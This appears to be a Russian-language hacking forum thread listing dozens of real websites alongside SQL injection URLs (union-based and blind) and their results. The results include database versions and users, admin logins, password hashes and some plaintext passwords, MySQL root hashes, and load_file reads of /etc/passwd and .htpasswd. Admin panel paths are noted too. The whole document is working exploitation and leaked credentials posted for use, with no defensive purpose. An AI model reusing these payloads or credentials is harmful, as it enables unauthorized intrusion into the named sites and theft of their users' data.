http://www.melnikov-tex.ru/about/more.php?id=9991%20union%20select%201,2,3,4,concat _ws(0x3a,username,password),6,7,8,9,10,11,12,13%20 from%20users--
Админка:
Логин: adm1285
Пользователь: 41d7e23b31063b763cbf6a1322e0cec5

http://www.zvezdy.ru/company/news/?id=-1+union+select+1,2,3,4,concat_ws(0x3a,vers ion(),database(),user()),6,7,8,9,10,11--

Database Version : 5.0.67-log
Database name : u32942
User name : u32942@10.10.227.65

админы :

http://www.zvezdy.ru/company/news/?id=-1+union+select+1,2,3,4,concat(login,0x3a,passwo rd),6,7,8,9,10,11+from+ADMINS+limit+0,1--

kadry:d14b580f553ef88c15227a48d09db390
user:ee11cbb19052e40b07aac0ca060c23ee
margo:a31a83e3eb0bc30c5e373ae45b532622
Liqvidator-pdtpls:2f7db3cad1563fffbf526f6aadf2dfa1
bars:3dac72783f355eb5f7204a16e28581aa
fin:e1a63ee61e0d3423eb9b28d35c478d49
admin:98e2f8e1b90d4399dcd0dd4ad40cb2da
pro:4328908bba95a0fc6f6ad00e5e121871

todosurf.com
http://www.todosurf.com/noticias/ver.php?id=-334+union+select+1,2,3,4,5,6,7,8,9--
5.0.67-community-log
tables:
17:comentarios
18:contacto
19:encuesta
20:enlaces
21:estadisticas
22:fotos
23:noticias
24:puntuacion
25:usuarios
26:videos
27:webcams
28:webcams_visitas
29:zona_continente
30:zona_pais
31:zona_provincia
32:zona_spot

http://www.claimscompensation.com

http://www.claimscompensation.com/news.php?id=1+union+select+1,concat_ws(0x3a,vUser, vPassword,vAdmin_email),3,4,5,6,7,8, 9,0+from+admin--

database version 5.0.67.d7
database_name - ccb_cms

vUser - admin
vPassword -ccb
vAdmin_email - bh@claimscompensation.com

http://www.anitaroddick.com/readmore.php?sid=-44+union+select+1,2,3,convert((username)+using+lat in1),convert((user_password)+using+latin1),6,7,8,9 +from+users--
все юзвери как на ладони;)

http://www.lrwc.org/pub2.php?sid=-999+union+select+1,concat(version(),0x3b,database( ),0x3b,user()),3,4,5,6,7,8--
4.0.27-log

http://www.poster.by/main.php?cat=-1)+union+select+concat_ws(0x3a3a,email,login,passw ord),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+use rs+limit+20,1/*

No commetns

http://www.unimerco.com/index.php?mid=99+union+select+1,2,3,4,version(),6, 7,8/*
4.0.18-standard-log

http://www.cautis.ro/ro/index.php?id=10077+AND+ASCII(SUBSTRING((select+y=1 ...3() ),1,1)>x&lang=ro

y1=version
y2=database
y3=user

x1=52,46,49,46,50,48,45,108,111,103
x2=99,97,117,116,105,115
x3=99,97,117,116,105,115,64,108,111,99,97,108,104, 111,115,116


Version : 4.1.20-log
Database : cautis
User : cautis@localhost

http://www.parktime.ru/index.php?razdel=article&id_article=-1+union+select+concat_ws(0x3a,version(),database() ,user()),2--

Database Version : 4.1.22
Database name : parktime_db_main
User name : parktime_mysql@10.1.48.39

админ :

http://www.parktime.ru/index.php?razdel=article&id_article=-1+union+select+concat _ws(0x3a,login,password),2+from+users--

admin:65d9468e73f95afaeb578d5312d577f4

www.litexplus.md

Database Version: 5.0.24a
Database name: litexplus
User name: root@localhost


http://www.litexplus.md/articles.php?id=5+union+select+1,concat(login,0x3a ,pass)+from+users

admin:25e4ee4e9229397b6b17776bfceaf8e7:adminpass

http://www.litexplus.md/swadmin

file_priv Y

http://www.litexplus.md/articles.php?id=5+union+select+1,load_file(0x2f686 f6d652f7777772f6c69746578706c75732e6d642f737761646 d696e2f2e6874706173737764)

frik:rmlqmtXgO9.rc:111


http://www.litexplus.md/sql

2diznt
В антибоян заглядывать надо.....


http://halyava.net/index.php?idk=-12+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5,6
5.0.67-community:halyava_admin@localhost:halyava_catalog

http://www.acorn-sb.ru/read.php?nid=-1+union+select+1,2,3,concat _ws(0x3a,version(),database(),user()),5,6--

Database Version : 4.0.26
Database name : acorn_sbru
User name : acorn_sbru@acorn-sb.ru

------------------------------------------------------+

http://www.slavich.ru/?id=3&aid=-1+union+select+1,concat_ ws(0x3a,version(),database(),user()),3,4,5,6,7--

Database Version : 5.0.32-Debian_7etch5-log
Database name : slavich
User name : slavich@localhost

Чехия . ру - все о Чехии
http://www.czechia.ru/firms/index.html?id=-14+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at(user(),0x3a,database(),0x3a,version()),15,16,17--

user(): amigo-tours@zvm14.host.ru
database(): amigo-tours
version(): 4.0.27-log

PR=3

http://www.autofavorit.ro/chestionare.php?numar=-19+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7,8,9,10/*


Database Version: 4.1.22-standard
Database name: auto_all
User name: auto_admin@localhost

http://www.warcraftparadise.com/articles.php?id=-13+union+select+1,concat(user(),0x3a,version()),3, 4,5,6,7,8,9/*

Database Version: 4.1.22-standard
Database name: warcraft_articles
User name: warcraft_user@localhost

http://www.teplovod.ru/articles.php?id=13+UNION+SELECT+1,AES_DECRYPT(AES_ ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version( ),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x787371 6C696E6A656E64),0x71),0x71),3,4,5,6,7,8,9,10,11,12 ,13,14

Database Version: 5.0.24-standard
Database name: db_teplovod2
User name: teplovod2@localhost

http://www.md-tuning.de/Felge-ALU-Winter-Dotz-Imola-Focus-I-Typ-DAW-DBW-DNW.php?Rubrik=Reifen&ID=-21095+union+select+1,2,version(),4,5,6,7,8,9,10,11 ,12&tuning=tuning
4.0.24

http://www.arthobbs.com/articles.php?Submit=view&id=13+union+select+1,concat(version(),0x3a,user()) ,3,4,5

Database Version: 5.0.67-community
Database name: arthobbs_art
User name: arthobbs_site@localhost

http://www.perio.com.ua/articles.php?id=-13+union+select+1,concat(version(),0x3a,user()),3, 4,5,6

Database Version: 5.0.41-community-log
Database name: indianem_yana_db
User name: indianem_yana@localhost

http://www.leannashville.com/fitness_health/articles.php?ID=-13+union+select+1,2,concat(username,0x3a,password) ,4,5,6+from+users

Database Version: 5.0.67-log
Database name: lean_db
User name: lean@216.185.128.200

http://www.eoe-tata.com/articles.php?id=-13+union+select+1,concat(login,0x3a,pass)+from+adm ins

Database Version: 5.0.67-log
Database name: eoetata
User name: dbuser@dasani.dreamhost.com

http://tempgun.ru

http://tempgun.ru/show_part.php?id=-2+union+select+concat_ws(0x3a,login,pass,ip,name)+ from+test.1ckkm_adm_usr--

database: 5.0.67
name_datebase: tempgun_1

Login: admin
Pass: 12345
IP: 82.142.140.130

http://tempgun.ru/admin

http://www.astrainfo.ru/cataloque.php?id=-1+union+select+1,concat _ws(0x3a,version(),database(),user()),3,4--

Database Version : 4.0.26
Database name : wwwastrainforu
User name : astrainf@box.hc.ru

админы :


http://www.astrainfo.ru/cataloque.php?id=-1+union+select+1,concat_ ws(0x3a,login,passwd),3,4+From+users--

astra:astra0311
perfex:perf0410
baltm_rostov:balt0610
servico:serv0311
bsv:bsv1912

http://darkomen.ru/?go=19&indx=1304+union+select+1,2,@@version,4,5,6,7,8,9,0 ,11,12--
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
http://darkomen.ru/?go=19&indx=1304+union+select+1,2,user_name(n),4,5,6,7,8, 9,0,11,12--
Пользователи: public,dbo,guest вывел через user_name(n) for n=0,1,2
С помощью DB_NAME(n) перебирая n я нашел еще
http://darkomen.ru/?go=19&indx=1304+union+select+1,2,DB_NAME(n),4,5,6,7,8,9, 0,11,12-- for n=1....10
1)master
2)tempdb
3)model
4)msdb
5)lin2db
6)lin2comm
7)l2gloss
8)lin2world
9) lin2log
10)lin2clancomm

http://www.tathaastumag.com/static.php?pid=-1/**/UNION/**/SELECT/**/1,2,3/**//*

Database Version: 4.1.22
Database name: tathaastumag
User name: tathaastumag@web535

http://www.conadel.gob.sv/noticia.php?id=-11+union+select+1,version(),3,4,5,6,7,8,9,10--
http://www.coes.org.sv/noticias.php?id=-232+union+select+version(),2,3,4,5--
http://www.mangoymar.com/eng/hotels_view.php?id=-2+union+select+1,2,3,version(),5,6,7,8--

ДЕЛОВЫЕ ЖЕНЩИНЫ РОССИИ
http://www.dgr.ru/?id=-15+union+select+1111,concat(version(),0x3a,databas e(),0x3a,user())--

вывод в ошибке:

Warning: file_get_contents(4.0.27-max-log:dgr122_main:dgr122_main@v2.valuehost.ru): failed to open stream: No such file or directory in /mnt/pub/home/dgr122/html/main.php on line 70

PR=5

«Современная АЗС» – ежемесячный журнал
http://www.sovazs.com/showcontest.phtml?id=-15+union+select+1,2,3,4,concat(version(),0x3a,user (),0x3a,database()),6,7,8,9,10,11,12,13,14,15--

user(): sovazs@hosting2.colocall.net
database(): sovazs
version(): 5.0.75-log

PR=5

InfoSecur.ru
http://www.ftp.infosecur.ru/katalog.php?id=-15+union+select+1,unhex(hex(version())),3--

user(): infosec-sql@bay.hc.ru
database(): infosec
version(): 4.1.18

ТИЦ:70

PageRank = 7

http://canada.org.tw/english/events_resources.php?id=66785434898767789+union+se lect+1,2,concat_ws(0x3a,version(),user(),database( )),4,5,6,7,8,9,10,11,12,13,14--

Database Version: 5.0.45-log
Database name: pqcstud_ctot
User name: ctot@p11.coowo.com


PageRank = 6

http://mto.societymusictheory.org/mto-events.php?id=4555455446876555+union+select+1,conc at_ws(0x3a,version(),user(),database()),3,4,5,6,7, 8,9,10,11--

Database Version: 5.0.67-log
Database name: mto
User name: mto@gravano.dreamhost.com



http://www.bulgariandiocese.org/article.php?id=555666432466/**/uNiOn/**/sElECt/**/1,2,concat_ws(0x3a,version(),user(),database()),4, 5,6,7,8--

Version:4.1.22-standard
User:pe@localhost
Database:bulgaria_pe

lhttp://www.mon.gov.ua
http://www.mon.gov.ua/forum/new.php?f=0&r=-76773+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16--

database: 5.0.27
name_database: mon_forum

login - su
pass - Fktrctq

http://www.moy-doktor.ru/katalog.php?id=36+union+select+1,2,3,4,5,6/*

Database Version: 5.0.22-log
Database name: moydoktor_db
User name: moydoktor_user@localhost

PageRank = 5

http://moravianhistoricalsociety.org/store/books/detail.php?id=333444455446687+union+select+1,2,con cat_ws(0x3a,version(),user(),database()),4,5,6,7,8 ,9,10,11--

Version: 4.0.27-max-log
User: dbo274567297@74.208.16.241
Database: db274567297

http://www.dia-m.ru/news.php?newsid=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10,11,12--

Database Version : 4.0.27-log
Database name : host2846
User name : host2846@localhost

PageRank = 6

http://naccrra.org/news/press_releases/full.php?id=77778656544433446+union+select+1,conca t_ws(0x3a,version(),user(),database()),3,4--


Database Version: 5.0.60-enterprise-gpl-log
Database name: naccrra_website
User name: root@localhost


http://naccrra.org/news/press_releases/full.php?id=77778656544433446+union+select+1,conca t_ws(0x3a,user,password),3,4+from+mysql.user--

root : 58012894248545c5

Читаем etc/passwd

http://naccrra.org/news/press_releases/full.php?id=77778656544433446+UNION+SELECT+1,CONCA T(0x3a,LOAD_FILE(0x2F6574632F706173737764),0x3a),3 ,4--



http://www.legion.org/national/divisions/magazine/release?id=44480687986+union+select+1,concat_ws(0x 3a,version(),user(),database()),3,4,5,6,7,8--

Database Version: 5.0.67-log
Database name: legion
User name: root@www.hp-inc.com


http://www.legion.org/national/divisions/magazine/release?id=44480687986+union+select+1,concat_ws(0x 3a,user,password),3,4,5,6,7,8+from+mysql.user--


root : *9E4CAEBB7D7123930422B9652E4BEC5437A11DCA


Читаем etc/passwd

http://www.legion.org/national/divisions/magazine/release?id=44480687986+UNION+SELECT+1,CONCAT(0x3a, LOAD_FILE(0x2F6574632F706173737764),0x3a),3,4,5,6, 7,8--


PageRank - 6

http://www.dirjournal.org/about.php3?id=15554438776765+union+select+1,concat _ws(0x3a,version()),3,4,5,6,7,8,9,10,11,12--

Version: 4.0.24
User: pleksus@localhost
Database: JOURNAL_di

http://constant.com.kg/news?id=-1+union+select+1,2,3,version(),5--

http://www.mielie.co.za/index.php?page=news&id=6+union+select+1,2,concat_ws(0x3a,username,pass word),4+from+tbluser

http://www.hlcargo.com/v3/index.php?m=news&id=-1+union+select+1,2,3,unhex(hex(version())),5,6,7,8--

http://www.home-exposure-marbella.com/index.php?action=local-news&id=-1+union+select+1,concat_ws(0x3a,password),3,4+from +admin--

http://www.ssmp72.ru/index.php?go=news&id=-1+union+select+1,version(),3,4--

http://www.exsolcom.kz/index.php?news&id=-1+union+select+1,concat_ws(0x3a,login,pass),3,4,5+ from+admin--

http://bigirk.ru/?module=news&id=-1+union+select+1,2,concat_ws(0x3a,password),4+from +users--

http://umi.com.ua/?do=news&id=-1+union+select+1,concat_ws(0x3a,database(),version (),user())--

http://www.mstar.lv/index.php?lang=ru&page=news&id=-1+union+select+version(),2,3,4,5--

http://www.regina.ru/main?page=news&id=-1+union+select+1,2,3,version(),5,6,7--

http://www.cbgaindia.org/press_releases.php?id=-1+union+select+1,2,3,4,version(),6,7--

http://www.animalfarmfoundation.org/section.php?id=-1+union+select+1,2,3,4,5--

http://rp.ksu.ru/izd.php?id=-1+union+select+version(),2,3--

http://www.zolushka-spb.ru/?module=news&id=-1+union+select+1,2,versioN(),4,5--

http://mgauto.ru/main.php?page=news&id=-1+union+select+1,2,table_name,4,5,6,7+from+informa tion_schema.tables+limit+21--

http://www.greenmax.ru/index.php?action=news&id=-1+union+select+1,2,version(),4,5,6,7,8,9--

http://www.click-uri.ro/vot/index.php?id=-4661+UNION+SELECT+1,2,3,CONCAT_WS(0x3a,version(),d atabase(),user()),5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20--

Database Version: 5.0.67-community
Database name: clickuri_director
User name: clickuri_clickur@localhost

http://www.franchiseupdatemedia.com/index.php?page=news&id=-1+union+select+1,2,3,user(),5,6,7,8--

http://www.tractor-m.ru/index.php?page=news&ID=-1+union+select+1,concat_ws(0x3a,username,password) ,3,4,5,6+from+users--

http://constant.com.kg/articles/news?id=-1+union+select+1,concat_ws(0x3a,admLogin,admPasswo rd),3,4,5,6+from+admins--

http://siladuha.org/news?id=-1+union+select+1,2,3,version()--

http://www.jeansshow.ru/rus/index/news?id=-1+union+select+1,2,3,version(),5,6--

http://toolpress.com.ua/news?id=-1+union+select+1,2,3,4,version()--

http://www.shockmedia.com.au/corporate/news?id=-1+union+select+1,2,version(),4,5--

http://www.ukbushido.com/news?id=-1+union+select+1,concat_ws(0x3,username,password), 3,4,5+from+admin--

http://gogolcasino.com.ua/news?id=-1+union+select+1,2,version(),4,5--

http://www.nika-ins.ru/news?id=-1+union+select+1,2,version(),4,5,6,7--

http://mariya-art.com.ua/?menu=news&id=-1+union+select+1,2,version(),4,5,6,7--

http://vcapital.kz/index.php?page=news&id=-1+union+select+1,2,concat_ws(0x3a,login,password), 4,5+from+users--

http://www.wuestenwandern.de/index.php?seite=news&id=-1+union+select+1,2,unhex(hex(concat_ws(0x3a,versio n()))),4,5--

Database Version: 4.1.13
Database name: ww_reisen_2
User name: ww_db_user@localhost

http://www.sourcecable.ca/page.php?PageID=46/**/UNION/**/SELECT/**/1,2,3,concat(id,0x3a,username,0x3a,password),5,6,7 ,8+from+admin/**//*

6:darryl:d7ed541b53f6f1e7b6f8f361fc638169
4:mbontje:4006353cf694274add3bbfd7045cf7cc 10:sandip:2f3d0072cce8890089c1332c21875ffb 12:domenic:e0fb06ae47197c44d433b77ec020d116

http://www.prodevelop.ro/index.php?action=description&pid=-13+UNION+SELECT+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7,8,9,10,11,12--


Database Version: 5.0.67-log
Database name: prodevelop
User name: pro_web@burke.dreamhost.com

http://www.nacrasailing.org/index.php?cat=news&id=-1+union+select+1,2,3,4,unhex(hex(concat_ws(0x3a,pa ssword))),6,7,8,9+from+user--

Database Version: 5.0.45
Database name: nacrasab_2
User name: nacrasab@localhost

Pagerank: 4
тИЦ: 650

http://www.truck.ru/news.php3?g=1&art=-1+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7,8,9,10,11,12,13--

Database Version : 5.0.51b-community-nt-log
Database name : truck
User name : truck@localhost

--------------------------------------------------+

Pagerank: 4
тИЦ: 600

http://www.gumis.ru/news.php?id=-1+union+select+1,concat_ws(0x3 a,version(),database(),user()),3,4,5,6,7,8--

Database Version : 4.1.22-log
Database name : gumis
User name : gumis@10.0.1.206

http://www.haagsesporttuin.nl/index.php?type=zoom&class=news&id=-1+union+select+1,2,3,4,5,6--

Database Version: 4.1.15-Debian_0.dotdeb.4-log
Database haagsesp
User name: haagsesp@localhost

-----------------------------------------------------------------------------------

http://www.newah.org.np/detailUpdates.php?ID=-22+union+select+1,2,3,4,5,6,7--

Database Version: 4.1.22-standard
Database: newahor_newahdb
User name: newahor_newah@localhost

------------------------------------------------------------------------------------

http://www.cpn.com.np/news.php?id=-5+union+select+1,2,column_name,4+from+information_ schema.columns+where+table_name=0x74626c5f61646d69 6e--

Database Version: 5.0.67-community
Database: cpncom_news
User name: cpncom_cpn@localhost

http://www.tbaysafecommunities.ca/~safecom/page.php?id=45/**/UNION/**/SELECT/**/1,2,3,concat(user,0x3a,password)+from+mysql.user+l imit+1,1/*

Database Version: 4.0.24_Debian-10sarge3-log
Database name: content
User name: contentman@cedar


root:3819a76b5dc90171:art4gama

PR5

http://www.scmmicro.com/security/view_product_en.php?PID=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,version( ),14,15,16,17,18,19,20,21,22--

5.0.26 : usr_web1_1 : web1@localhost

Достаем логин и пасс рута )
http://www.scmmicro.com/security/view_product_en.php?PID=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_w s(0x3a,user,Password),14,15,16,17,18,19,20,21,22+f rom+mysql.user--

admin:*F2D16E6DF079EDD64F913E55EDEEB021A3B47BBD

коневоз pr-4 ТиЦ - 600
http://www.konevoz.ru/index.php?id=752&subid=27&modid=27212+union+select+1,2,3,4,5,6,7,concat_ws(0 x3A,user(),version(),database())--+
konevoz_konevoz@localhost:5.0.67-community:konevoz_konevoz

http://www.bellagreetings.com/category.php?ID=114&CID=3%27/**/UNION/**/SELECT/**/1,password,3+from+mysql.user/*

пасс слева возле меню

Database Version: 4.1.20
Database name: superlaugh
User name: root@localhost

тама и load_file
http://www.bellagreetings.com/category.php?ID=114&CID=3'/**/UNION/**/SELECT/**/1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A6 26567696E,HEX(LOAD_FILE(0x2F6574632F7061737377642F )),0x7873716C696E6A656E64),0x71),0x71),3/*

http://www.agence.com.br/en/novidades-sobre-mercado-web.php?news=1'+union+select+1,concat_ws(0x3a3a,us r_login,usr_senha),3,4+from+agnc_usuario+limit+1,1/*

Просто и со вкусом! Бразильская веб-студия.

http://www.amcham.sk/?News&id=-1+union+select+1,2,3,4,5,6,7,8--

Database Version: 5.0.32-Debian_7etch5-log
Database name: amcham_sk
User name: amcham_sk@localhost

------------------------------------------------------------------------------------------------------

http://www.jatsbulgaria.org/show.php?type=news&id=-1+union+select+1,2,3,4--

Database Version: 5.0.67-msl-usrs-icd1-log
Database name: jatsbulgaria_jatsbulgaria
User name: jatsbulgaria@localhost

http://www.grand-arcade.co.uk/html/articles.php?id=67+union+select+1,concat(user(),0x 3a,version()),3,4,5,6

Database Version: 5.0.37-community-nt
Database name: grandarcade
User name: modus@localhost

http://www.joseantoniophd.com/website/articles.php?id=-5+union+select+1,2,3,4,5,concat(user(),0x3a,versio n()),7,8,9,0

Database Version: 4.1.22-standard
Database name: joseanto_jose
User name: joseanto_jose123@localhost

http://www.olek.dzidzius.net/dni.php?id=1+union+select+1,version()
5.0.41-community-log

http://www.pilulapop.com.br/dna.php?id=-50+union+select+1,2,version(),4,5,6,7,8,9,10
5.0.67-log

https://www.vineyardcincinnati.com/vcc.php?id=-1197+union+select+version(),2,3,4,5,6,7,8,9,10,11, 12,13,14/*
4.0.27-standard

Pagerank: 4
тИЦ: 550

http://www.aztpa.ru/?pg=-1+union+select+concat _ws(0x3a,version(),database(),user())--

Database Version : 5.0.75
Database name : aztparu_baza
User name : aztparu@78.108.81.121

---------------------------------------------+

Pagerank: 4
тИЦ: 550

http://www.diamash.ru/ru/about/news/index.php?id=16+union+select+1,2,concat_ws(0x3a,ve rsio n(),database(),user()),4,5,6,7,8,9,10--

Database Version : 4.1.22-log
Database name : wwwdiamashru
User name : diamash@localhost

PR - 4
http://krasnoturinsk.ru/cgi-bin/news/index.pl?id=9999+union+select+0,concat_ws(0x3a,ver sion(),database(),user()),2,3,4,5,6,7,8,9,10/*
Database Version : 4.1.22
Database name : TEST
User name : reporter@md.ae21vek.ru

PORSHE Украина.

http://www.porscheukraine.com.ua/index.php?id=-19+union+select+1,2,version(),4,5,6--

Database Version: 4.1.22
Database name: porscheukraine
User name: porscheukraine@192.168.170.49

PageRank - 6

http://www.massmoca.org/event_details.php?id=488867488077+union+select+con cat_ws(0x3a,version(),user(),database()),2,3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29--


Database Version: 5.0.32-Debian_7etch6-log
Database name: massmocalive
User name: massmoca@localhost


PageRank - 5

http://www.thevalleytrust.org.za/index.php?page=gallery&gallery=detail&galid=7777544368+union+select+1,2,3,4,concat_ws(0x 3a,version(),user(),database()),6,7,8,9,10--

Database Version:5.0.32-Debian_7etch8
User name: vtrustdb@localhost
Database name: vtrust


http://iscrat.org/chaplaincy/churches/church.php?id=666544488876777+union+select+1,conca t_ws(0x3a,version(),user(),database()),3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18--


Version:5.0.51b-log
User: chaplaincyuser@woodstock.bath.ac.uk
Database: CHAPLAINCY

PageRank - 6

http://www.ontarionature.org/network/groups_detail.php?ID=888907665446+union+select+con cat_ws(0x3a,version(),user(),database()),2,3,4--

Version: 5.0.22-Debian_0ubuntu6.06.2-log
User: ontarion@lsh408.van.ca.siteprotect.com
Database: ontarion


http://ndinfo.org/transit/profile.php?id=43334467765+union+select+1,concat_w s(0x3a,version(),user(),database()),3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28,29,30,31,32,33,34,35,36--

Version: 5.0.67-log
User: dulmer@cannonball.dreamhost.com
Database: web_ndinfo

http://www.setcorp.ru/main/pressrelease.phtml?news_id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30--&language=russian

Database Version : 5.0.45
Database name : setcorp
User name : maritime@localhost

админ :

http://www.setcorp.ru/main/pressrelease.phtml?news_id=-1+union+select+1,concat _ws(0x3a,login,pass),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+fr om+webiconf+limit+0,1--&language=russian

Anton:3891336

http://www.recipezaar.com/sitenews/post.php?pid=998+and+substring(version(),1,1)=5 5
http://www.recipezaar.com/sitenews/post.php?pid=998+and+ascii(substring(version(),2,1 ))=46 .
http://www.recipezaar.com/sitenews/post.php?pid=998+and+substring(version(),3,1)=0 0
http://www.recipezaar.com/sitenews/post.php?pid=998+and+ascii(substring(version(),4,1 ))=46 .
http://www.recipezaar.com/sitenews/post.php?pid=998+and+substring(version(),5,1)=2 2
http://www.recipezaar.com/sitenews/post.php?pid=998+and+substring(version(),6,1)=2 2
http://www.recipezaar.com/sitenews/post.php?pid=998+and+ascii(substring(version(),7,1 ))=45 -
http://www.recipezaar.com/sitenews/post.php?pid=998+and+ascii(substring(version(),8,1 ))=108 l
http://www.recipezaar.com/sitenews/post.php?pid=998+and+ascii(substring(version(),9,1 ))=111 o
http://www.recipezaar.com/sitenews/post.php?pid=998+and+ascii(substring(version(),10, 1))=103 g
Version: 5.0.22-log
Моя первая блинд-инъекция. Юзера не стал подбирать =).

http://www.etalon-service.com/?module=news&id=-1+union+select+1,2,3,4,5--

Database Version : 5.0.51-log
Database name : u47638
User name : u47638@10.10.12.176

------------------------------------------------------------------------------------------------------------------

http://www.inceram.com.ua/?mod=news&id=-1+union+select+1,2,3,4--

Database Version : 4.1.22-standard-log
Database name : inceram_inceramdb
User name : inceram_inceram@localhost

------------------------------------------------------------------------------------------------------------------

http://www.asstroy-spb.ru/?module=news&id=-1+union+select+1,2,3,4,5--

Database Version : 5.0.51-log
Database name : u41484
User name : u41484@10.10.12.176

------------------------------------------------------------------------------------------------------------------

http://www.basko-textile.ru/?do=news&id=-1+union+select+1,2,3,4--

Database Version : 4.1.22-log
Database name : wwwbaskotextiler
User name : baskotex@localhost

------------------------------------------------------------------------------------------------------------------

http://www.mirkvartir.od.ua/?file=news&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11--

Database Version : 4.1.22-standard
Database name : mku_mku
User name : mku_db@localhost

------------------------------------------------------------------------------------------------------------------

http://www.bolotov.info/?news&id=-1+union+select+1,2,3,4,5,6,7--

Database Version : 4.1.22
Database name : bolotov_admin
User name : bolotov_mysql@10.1.38.66
--------------------------------------------------------------------------------------------------------

АДМИН:

http://www.bolotov.info/?news&id=-1+union+select+1,2,3,concat_ws(0x3a,login,password ),5,6,7+from+admin--

Login: cassej
Pass: 7459

http://www.goczech.cz/index.php?c=detail&id=281+union+select+concat_ws(0x3a,version(),datab ase(),user()),2,3,4,5--

Database Version: 4.0.25-log
Database name: goczech
User name: goczech@10.1.1.9



админка

http://goczech.cz/admin

http://www.altist.ru/page.php?action=static&id=-3+union+select+1,2,3,4

Database Version: 5.0.75
Database name: altista_1
User name: altista_1@localhost

Login: admin
Pass: 43e9a4ab75570f5b : admin

Админку не нашел(((

F4R, хз чё эт такое :confused:
hashcracking.info сказал что пасс admin :(

по теме:
http://www.parket-junckers.ru/index.phtml?action=news&id=-1+union+select+1,2,3,4,5,6--

Database Version: 5.0.75
Database name: parketjn_parket
User name: parketjn_parket@localhost

http://www.inm-lex.ro/index.php?MenuID=-4+union+select+1,2,3,unhex(hex(concat_ws(0x3a,vers ion(),database(),user()))),5--


Database Version: 5.0.18-log
Database name: inmlexro_inm
User name: inmlexro@www1.linux.romtelecom.net.

http://aviaresurs.ru/?act=news&id=-1+union+select+1,unhex(hex(concat_ws(0x3a,version( ))),3,4,5--

Database Version: 4.1.14
Database name: aviaresurs
User name: aviablabla@localhost

Login: admin
Pass: gh4yxJ6CnipwA : ??

Админка:

http://aviaresurs.ru/admin/

http://www.woodlandheritage.org.uk/display.php?id=-31+union+select+1,2,3/*

Database Version: 4.1.22-standard
Database name: woodlandheritage
User name: woodlandheritage@gcs.eliteukserve.net

http://www.look-cctv.co.uk/display.php?page=News&article=-33+union+select+1,2,3,4,5,6,7,8+users/*

Database Version: 4.0.26-nt
Database name: lookcctv
User name: lookcctv@thulium.airtime.co.uk

4о за поля в users?отпишите в личку если найдете плз!

http://www.artandframing.co.uk/tradefair/art-display/art-display.php?id=81/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21/**/LIMIT/**/1,1/*


Database Version: 4.1.19-standard-log
Database name: artandframing
User name: artandframing@localhost

http://www.designaventure.co.uk/display.php?id=71/**/UNION/**/SELECT/**/1,2,3/*

Database Version: 4.1.22
Database name: stag_db
User name: stag@localhost

http://yamamotoprintmaking.com/catalog.php?a=category&id=-4+union+select+concat(user(),0x3a,version(),0x3a,d atabase())

Database Version: 4.1.22-STANDARD-LOG
Database name: YAMAMOTOPRINTMAKING
User name: YAMAMOTO@LOCALHOST

http://marqueesole.com/php/client/product.php?id=-124+union+select+concat(login,0x3a,passwd)+from+ad min

Database Version: 5.0.67-log
Database name: marqueesole_main
User name: msmainuser@scalise.dreamhost.com

http://www.salesbearing.com/products/product.php?id=-42+union+select+1,concat(username,0x3a,pwd),3,4+fr om+admin

Database Version: 5.0.40-log
Database name: nrworld
User name: nrworld@121.52.209.130

http://www.archaeolog.ru/?id=2&id_nws=99&zid_nws=-4+union+select+version()--


Database Version: 5.0.45
Database name: archaeolog
User name: archaeolog@localhost

АДМИНКО=)
http://www.archaeolog.ru/admin/
Lopatin:L8XiGk:nvl@archaeolog.ru

http://www.torgintech.ru/news.php?act=news&id=-1+union+select+1,2,3,4,5--

Database Version: 4.1.21-log
Database name: torgintech
User name: torgintech@localhost

----------------------------------------------------------------------------------------------------------------

http://www.hdiaustin.org/index.php?view=news&id=-1+union+select+1,2,3--

Database Version: 5.0.67-community
Database name: ??
User name: hdiaust_read@localhost

----------------------------------------------------------------------------------------------------------------

http://www.cinetec.ru/?m=news&id=-1+union+select+1,2,3,4,5,6,7--

Database Version: 5.0.45
Database name: cinetec
User name: cinetec@localhost

----------------------------------------------------------------------------------------------------------------

http://www.liberiansinholland.com/index.php?p=news&id=-1+union+select+1,2,3,4,4,6,7,8,9,10--

Database Version: 4.0.27-standard
Database name: liberian_database
User name: liberian_website@localhost

http://www.eage.ru

http://www.eage.ru/ru/conferences/detail.php?id=-18+union+select+1,2,concat_ws(0x3a3a,version(),dat abase(),user()),4,5,6,7,8,9,0,11,12,13,14,15--

database : 5.0.67-log
name_datadase : u47323
user : u47323@10.10.223.211


name : Administrator
Log : admin
pass : string
email: evgrafov_a@mail.ru

http://www.barrowhill-vets.co.uk/mygallery/display.php?id=-66%27+union+select+11,concat(user(),0x3a,database( ),0x3a,version()),3,4,5/*

GUESTS@localhost:mygallery:5.0.22

